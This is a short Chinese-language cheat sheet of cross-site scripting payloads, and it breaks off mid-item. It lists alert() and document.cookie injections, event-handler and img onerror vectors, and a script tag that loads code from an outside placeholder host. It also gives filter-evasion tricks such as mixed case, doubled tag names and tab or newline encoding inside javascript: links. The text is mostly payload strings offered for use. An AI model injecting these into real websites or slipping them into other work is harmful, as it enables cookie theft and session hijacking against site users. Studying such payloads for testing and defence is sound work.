简单弹窗:
<script>alert(1)</script>
反射cookie:
<script>alert(document.cookie)</script>
事件:
onclick=alert(1)
<img src=1 onerror=alert(1)跨站引用:<script scr="http://xxxxxx.com/xxx.php?xxx=xxx"></script>
下面来干货了
1、链接
"><a href=javascript:alert(1)>
2、大小写
" Onclick=alert(1)>
"<Script>alert(1)</Script>
3、单双引号或/ /
<script>alert("1")</script>
4、双写
<scrscriptipt>alert(1)</scrscriptipt>
5、加制表符%09;加%0a %0d
" ><a href=javasc%09ript:alert(1)>
6、http://验证
//注释http://
<